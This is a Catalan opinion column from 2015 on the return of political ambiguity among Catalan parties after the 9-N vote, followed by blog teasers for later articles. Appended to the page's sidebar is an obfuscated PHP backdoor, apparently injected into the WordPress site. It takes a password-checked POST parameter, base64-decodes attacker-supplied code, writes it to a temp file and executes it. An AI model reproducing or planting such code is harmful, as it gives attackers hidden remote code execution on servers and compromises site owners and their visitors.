Torna l’ambigüitat

06 de març de 2015 0

La Vanguardia 7 de Març 2015

ICV s’amaga rere un “Estat lliure i sobirà” dins d’Espanya. Duran s’oposa a les plebiscitàries i s’atrinxera en un partit nou. Podem vol “explotar l’odi contra Artur Mas” i cavalca sobre un procés constituent que necessita de la participació del PP. Ciutadans es maquilla com el partit de la solidaritat, i abandona l’estètica milhomes del 12 d’Octubre. ERC flirteja amb els tripartits municipals i es gronxa en el marc mental d’Iglesias i Colau. CDC parla més de refundar-se que de refundar-nos. El president i el Govern ens ensenyen el dit i no la lluna, delegant el full de ruta en el CATN enlloc d’explicar-nos sense embuts per què és millor un Estat independent que l’autonomia.

Quatre mesos després del 9-N, la principal novetat és l’ambigüitat, que torna a cotitzar a l’alça entre els partits just quan estàvem a punt d’espolsar-nos-la. Tanta pirotècnia contra Pujol i al final tothom li està imitant els tics.

L’ambigüitat pot ser una manera pragmàtica de fer política quan tens camp per córrer, com en tenien Pujol i el PSC els primers anys de la Constitució. Però quan es converteix en el pa de cada dia, és només una manera de dissimular que no fas res i que ets més feble del que pots admetre, com els darrers anys del pujolisme o la part cínica de la reforma de l’Estatut.

Es pot pretendre que les úniques causes de l’independentisme són la crisi i el menyspreu, però la veritat és que veníem de les ruïnes del catalanisme. Aquella manera de fer plena de sobreentesos no només havia deixat de donar rèdits i no només ens deixava a mercè d’un espanyolisme alliberat del sentiment de culpa, també es mostrava incapaç d’imaginar cap futur, a dreta i a esquerra, que no fos la tràgica mediocritat provincial.

La virtut del que va venir després va ser el desprestigi del sobreentès i l’autocensura. Queien les màscares. Contra la teoria de l’espiral de silenci, el tornado de sinceritats. Podies canviar d’opinió sense erosionar la dignitat dels teus propòsits perquè no calia endevinar-te dobles intencions. Als partits i als poders, però, se’ls va indigestar el canvi. Procés, Estat propi, dret a decidir, federalisme, tercera via, sobiranisme: els nous eufemismes.

Donar oxigen a l’ambigüitat té conseqüències, com es va veure amb les dues preguntes. Sumes més partits, però envies el senyal que estàs obert a l’il·lusionisme. El súmmum va ser el 9-N: pots dir que era blau i negre o blanc i daurat. Al país li hauria sortit més a compte explicitar la renúncia o enfrontar-se a l’Estat, perquè l’ambigüitat del procés participatiu va esperançar els partits: es pot putairramonetejar.

Mentre no siguem més clars amb els fins i els mitjans, mentre no ens fem responsables de l’èxit i del fracàs, i busquem el cos a cos quan toca, anirem alimentant els cínics i els brokers del victimisme. L’ambigüitat cotitza perquè ha estat l’opció del president. Diu Tomàs d’Aquino que un petit error al principi és un gran error al final. O, en llatí: parvus error in principio magnus est in fine.

Etiquetes

Darrers articles

Què ha passat amb la CUP?

Vaig votar la CUP el desembre del 2017, després del Primer d’Octubre. Pensava que podien ser una força per controlar les pulsions destructives dels dos grans partits, que havien fet tot el possible per malbaratar la millor oportunitat que ha tingut Catalunya per treure’s el control d’Espanya del damunt i construir un món propi. Però […]

Per què Puigdemont no serveix per al futur de Catalunya

Puigdemont no serveix pel futur de Catalunya, almenys si el futur que volem no passa per la pacificació i la tornada enrere. La proposta de Puigdemont significa l’acceptació d’una falsa normalitat política que deixa en un calaix l’autodeterminació, convertint-la en una promesa etèria, i camina cap a un Govern autonòmic sense eines per defensar els […]

Propaganda colonial

Aquest anunci és tòxic: “La Generalitat governa bé.” Ve a dir que no hi ha cap problema. Que es pot viure sota aquest règim. Que és millor abandonar tot intent d’assenyalar el conflicte i carències de fons i encarar-los. Vol convèncer-nos que la mort és dolça. Mireu-lo: https://x.com/govern/status/1765721034731253906?s=20 La situació de Catalunya es que està […]

  • Cerca
  • if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}